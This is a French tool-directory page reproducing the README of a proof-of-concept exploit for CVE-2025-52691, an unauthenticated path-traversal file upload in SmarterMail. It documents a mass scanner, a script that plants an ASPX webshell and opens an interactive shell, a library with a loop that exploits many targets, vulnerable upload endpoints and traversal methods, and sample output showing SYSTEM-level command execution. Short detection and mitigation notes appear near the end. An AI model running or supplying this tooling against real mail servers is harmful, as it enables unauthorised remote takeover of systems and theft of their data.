Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-52691-poc | Kitploit
Outils/GitHubGitHub/rimbadirgantara/cve-2025-52691-poc
Scanners de VulnérabilitésGénération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubrimbadirgantara/cve-2025-52691-poc

CVE-2025-52691-poc

Voir le dépôt
3il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-52691 POC

Preuve de concept pour CVE-2025-52691 - SmarterMail RCE par téléversement arbitraire de fichier non authentifié

⚠️ Avertissement

Réservé aux tests de sécurité autorisés et à des fins éducatives uniquement. L'accès non autorisé est illégal.

Vue d'ensemble

Vulnérabilité critique dans SmarterMail permettant le téléversement arbitraire de fichiers sans authentification via un traversement de chemin, conduisant à une exécution de code à distance.

Vulnérabilité : Le traversement de chemin dans les points de terminaison de téléversement permet de déposer des webshells ASPX à la racine web
Impact : Exécution de code à distance sans authentification
Vecteur : Réseau / Non authentifié

Installation

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3

Outils

check.py - Scanner de vulnérabilités

Analyse les cibles pour détecter la vulnérabilité CVE-2025-52691. Enregistre uniquement les URLs vulnérables dans le fichier de sortie.

root@kitploit:~
# Single target
python check.py https://mail.example.com

# Multiple targets
python check.py -f targets.txt -o results.txt

# Custom timeout
python check.py https://mail.example.com -t 30

Sortie : Une URL vulnérable par ligne dans results.txt

pwn.py - Outil d'exploitation

Téléverse un webshell ASPX et permet l'exécution de commandes.

root@kitploit:~
# Basic exploit
python pwn.py https://mail.example.com

# Execute command
python pwn.py https://mail.example.com -c "whoami"

# Interactive shell
python pwn.py https://mail.example.com -i

exploit.py - Bibliothèque Python

Module d'exploitation réutilisable pour l'intégration dans des scripts personnalisés.

En tant que bibliothèque :

root@kitploit:~
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)

if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))

# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()

# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))
    print(exploit.execute_command("hostname"))
    print(exploit.execute_command("ipconfig"))

En tant que script autonome :

root@kitploit:~
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"

# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
    config = TargetConfig(base_url=target)
    exploit = SmarterMailExploit(config)
    if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
        print(f"[+] Exploited: {target}")
        print(exploit.execute_command("whoami"))
EOF
python my_exploit.py

Détails techniques

Points de terminaison vulnérables :

root@kitploit:~
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx

Méthodes d'exploitation :

  • Téléversement de formulaire multipart avec traversement de chemin (../wwwroot/)
  • Requête POST brute avec en-têtes personnalisés
  • Charge utile JSON avec contenu encodé en base64

Webshell : Shell ASPX minimal acceptant des commandes via le paramètre ?cmd=

Déroulement de l'attaque

  1. Analyser la cible : python check.py <target>
  2. Exploiter : python pwn.py <target> -i
  3. Exécuter des commandes dans le shell interactif

Détection et atténuation

Détection :

  • Surveiller les téléversements de fichiers ASPX vers les répertoires web
  • Vérifier les journaux pour détecter des motifs de traversement de chemin (../)
  • Alerter sur les requêtes inattendues vers /api/upload

Atténuation :

  • Mettre à jour SmarterMail vers la dernière version
  • Mettre en œuvre une validation stricte des chemins de fichiers
  • Déployer un WAF avec filtrage des téléversements
  • Exiger une authentification sur les points de terminaison de téléversement

Exemple

root@kitploit:~
$ python pwn.py https://mail.example.com -c "whoami"

[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx

[*] Executing: whoami
[+] Output:
nt authority\system

Obtenez toujours une autorisation appropriée avant de tester.

Télécharger l’outil